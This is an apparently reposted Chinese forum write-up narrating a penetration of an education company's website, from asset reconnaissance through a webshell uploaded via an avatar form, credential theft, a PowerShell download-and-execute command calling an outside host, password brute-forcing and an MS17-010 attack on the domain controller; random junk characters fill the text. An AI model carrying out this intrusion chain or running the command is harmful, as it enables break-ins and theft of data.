|
8 S# B" a/ j+ O! z
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路3 C5 G6 L e8 Q! T' R
* Z2 L3 }7 O" l0 V, g. F+ o
6 g/ A$ Y" z; @& A
4 G. ?2 x. j+ W0 i7 G
: h9 s& B0 A- W; B/ f" a$ H6 f- r* F; w& j, Q/ x) d
正文
! E. D' w; `8 T3 c
8 |3 E6 E$ q( {' I' L) z5 Y# S* p1 M' H6 j; p' G2 x- z% b0 y6 q
4 _- D0 b# x s8 ~7 m/ W
7 E7 V {1 T, |) l
7 K/ ?% I* E) y' R/ s4 e8 R# @
目标:www.xxxx.com(一家教育机构)
) `6 V+ f% |6 |+ W
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能* `' F4 d* [) g/ V+ j8 P# C) `
0 Q. c: h/ w, I8 r8 p) P
7 e: t* _+ \" b* v* H7 ^  " W+ d9 J5 D( w; H: s8 S7 e, h
' s, ?4 T5 `9 K# z/ B! m5 s& y
0 m e7 [: u! [. x- ^
进行了简单的信息搜集
5 ~* m/ T$ u+ o$ g( o% H
- y6 J$ Z. Z. K8 d3 N9 \, |3 Q" V! h# }+ K* H+ F7 q7 f
" w4 M- r$ G0 ?! }5 Q7 Q1 r
+ f% E9 P8 `0 `4 m+ o2 i3 i
子域名搜集9 {- l' {6 z/ Y; m+ N
8 o" H; d% r# E, h5 E, p+ K' M5 L) z
; H8 T5 Y& B4 b* e1 n# u 
2 p7 g2 w8 P& Z. C0 W0 C$ W4 f
0 {3 e' g- Z Q+ X
, I) Z8 [5 w9 Q1 O4 Y3 P7 B! g( D. m fofa找资产
0 v+ h7 W% O1 Y8 H
' ]8 w9 q4 V, ]
) w& C7 G& M o/ i, f3 }2 l3 z/ \
: [8 o4 C3 O; [, x
) A* J0 D1 u7 D) |6 D8 N  , j% f* Z( c" K" K: x$ w+ p! E
* ?* j+ a) \1 ]! r' v {+ Y
2 f; G4 o; X$ _) }! l4 O8 P
一共七个资产。去重之后只有两个。
; R; g! y- X4 i+ y! |* y
# g5 b0 x7 Y8 O! [% ]; S3 H* _
* f4 P9 N$ t' i
) a2 _, `5 k I+ J: l/ ]& _" _. w9 A q7 N
目录探测3 Y f9 s. U; k
( I6 O" |, ~+ Y) o' ? x
( K7 Y0 [: a- i, ]1 n( ~ 
. K( _9 h: `2 r o" c* o3 x 3 x0 j C$ x* x6 o
& i- k0 Q1 p8 q0 f# `$ [. |" C
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
8 k) v H2 h* ^/ v9 S- V8 V
, m# n- | L1 k! R
! w1 i0 [8 n3 ] 1 i! S1 r3 T( M9 Z- Z
& a8 `) x; ]) H1 d% C5 Z" }- o
我又尝试了通过修改返回包来绕过登录界面
: R- N2 s) b' ]0 V& @ S; N) w- N
: E) ~( P: W* o0 {1 N; n2 d3 \5 K w; [0 o
 7 f1 y% m; s$ y
% x) w+ l ]' ?8 \1 U5 W
; P: T6 g, d' i4 I: U! }# y3 G 还是不行,尝试注入无果
% u& G: e( ^. i 6 x- ^; T8 Z' U! Z! T9 c, P
9 \- e# z0 V* S/ W 
7 z1 h" Y$ ? j- l! K
7 }0 p) t4 R# L+ C4 C- |
" o0 Y/ u6 Q7 ?4 Y 不过我目录探测出了一处Spring信息泄露
0 }( m& D; O9 s8 j# @
- e8 P3 _3 |& _; b& F: { ^7 X# M4 t5 E* P- m* Q, V1 S0 ^- w' M
- d y' P' m1 Y( Y8 N
4 ^" v" C3 H: E" P; {0 b
 ; g2 ~+ z7 f; R* ^$ t- Q7 ~
# O" H7 f0 }: y9 } p1 |
" e* b& C" m9 b! @/ S 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录5 i, t y @3 I* }8 I
( T5 a8 m m- U2 {+ Q+ M0 x
7 o- e0 ~7 H; }/ {0 o$ q, \
 + F, V2 a/ v0 M
5 S2 _& U7 ~* `6 y( B! K } j- b
! Y$ m* j9 e0 \- T5 H+ h 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。& G% r! m' Z1 {, P r, w" K
' ?5 y3 E6 `' |$ t: E4 g: Y2 O# D4 J0 G. w/ S% U! M# ~9 u% Q/ h
 5 d; b* l, _, u X, ]! s8 O
Y4 d$ B6 ]' O0 b' v3 F7 ]2 v: W
获取有些师傅到这一步就手机抓包电脑测了。: K5 P5 |7 e1 W# h
! G' }- ^" {7 |9 n) Q
1 B, }: ^) [ J5 T! Z6 m9 l" E4 I Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
! Y4 L' t; }7 W: y( f
+ x. t! j- e) \" M: w
! H1 `! d' f) T 其中在一个公众号发现了小程序,可以进行注册。$ q+ t( H* E$ x- Q" _
( z( f, R* X9 K8 \, [5 ^
# g0 ^% @2 ] A, _ 看到了头像上传,尝试上传获取WebShell
( }( U+ s" d$ @3 [& l
! u b$ u5 Z( O& K( U+ T5 T" H2 O# i; Y, U
 # S/ u' T* R2 D5 ~" l2 ?6 v2 Y- ?
$ c1 E2 u. a7 v, C/ x2 b" V3 m+ d' O( } V$ K
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问6 M2 L0 X7 W1 s% Z Q' M& W6 w8 V* z
* B& f' \( ~2 p# v, x+ J% w6 Y) R- D0 _4 N T2 J4 n
 4 X0 Y( Q0 Y* C8 J$ `! E
! e8 z6 o, F! G# Y1 C, x: Z% k5 ~9 b4 R" \! U) F
然后上了大马
7 C4 C5 X! ]8 S) r4 \, I5 {7 l - `, P! @* @5 R% V7 ]
3 n: w) t5 w$ `$ s
 : W) }4 V7 W+ T6 ]* Z
- m9 p; j: D. S4 D& C3 L" H
& v! g n% `* Z5 x 
: n' I/ u) t0 B3 p8 e 0 v3 W2 g/ \" A ^1 z
" G. t. ~ K4 m- U
通过翻找文件发现数据库账号密码. k# [, L) u% b' ]3 E# T, L" v
- ]& @. b/ V* g% `5 D2 D9 S) z
+ L6 o5 v* U& Z9 h7 B! b, g: o 
! U, l) b8 s9 Q0 _
+ b6 ~' w# x+ q3 v! Z
) f& ~! b9 [) |% ?: H9 Q4 Z --内网渗透# x' Q: E% m7 H* I
: ~3 |7 c1 A2 |; @, F
' N" X' X; J$ t3 x% r 直接通过powershell执行 cs上线
( b) |" F4 Z2 F+ L* R- J; X, U4 E
J; c% ]4 u2 J, n+ J8 h: P. q9 ?9 l2 [; l) a: x
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"9 D# b2 I5 H1 A% N8 x+ x1 i; r
% g5 b- l6 U0 J7 Q+ m3 u
" e! d; u& u& x8 N2 T 
8 U# y" ?* P; x5 u, E
& l$ E- g; t# p7 V7 |. v' r; W/ Y+ j5 \0 q& p* v4 j5 y" z
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 j4 X- b8 x' j7 `3 K* H
4 @7 V5 A0 K6 z5 e B
$ x: F) v# r1 h m0 X$ T* Z9 |; y 
: i4 P2 i: c8 l9 a' O ! x9 a% `" `9 _
1 g) x6 Z3 q3 B; c D6 Y3 \
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
" E; P3 }" s; X& A. O' O" R
. j/ F/ q# l% B& N/ O' {, d k
9 H/ x! U7 L. Z- @3 \* y
1 `; B% f4 h/ o% R Z5 N
. P) z4 A5 F: s
& t' Z* J/ l0 h D+ [ 
" Z9 X. @. A2 f1 d( v |/ c8 f2 O! K3 t' `1 D
" b- t* d N0 O1 }$ p
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
' {/ M+ _/ o% T! }( }" Q) H1 V
% i. I! `4 c) r9 z3 l
+ I+ D6 k, [; w! k
1 y1 D& w. u& s
" o3 p. c+ V0 F: i  : D6 n K1 k ^6 A) v1 w; R
% l9 ^2 Q; S$ [; V# i
+ C w1 E. K2 g9 s# W; f" v6 H
2 E8 w8 e( [) P# ?! ~9 ?. a$ |
6 N. z. |9 Y- C% ^
0 V3 n& Z+ p& n1 b6 [2 b * b/ N% `- c1 w; [0 Y
! G: F- r( v5 W5 S. V; \6 t& H ' M5 X. h9 U6 }2 o
. D) V% ]2 P1 f) s z: B* ]2 m. ^9 r3 a
小结: {5 x# A% W$ |! l/ f
) f8 f2 T3 F% \7 t6 C8 q; I3 k
; O' z, E% l( X. C7 K2 j$ o" h2 w 7 g) I7 I/ w; Z! P
/ ]2 O2 R5 e2 t7 C6 M" e, p+ d9 v: N# t! G$ s5 I$ e
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
8 W' | a* [$ {' t: T) l # z: Y- s7 A( B4 v& W1 `
/ T- ]& S7 C d! ?6 m
+ l& R: k T: `: P' r
+ |1 T ?9 ?, c4 E5 u5 u. y( Q( D& h# i
-
& f5 t0 _9 }2 h 0 [# A! c" g, J& B! I( Z$ K
2 O: S6 e5 ^+ J" T' z4 T2 i& i. E5 q
- 5 j$ t( S2 U* Q! a
5 s0 _4 z+ J, a) I6 p* e% ]
+ \, h$ l6 B7 D' i$ j7 B# B$ @
4 w. Z, m8 A) h+ V, h1 n6 Z0 Q, F+ f. @, ?: k
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
6 d& y6 T, `5 |. `: k5 l, b n
( l. |5 }6 x" K7 Y* @
0 _4 `* i+ @0 l+ e' w" }% d
w( Y C5 U, }4 b6 A | 
发表于 2024-3-1 19:41:32
收藏
支持
反对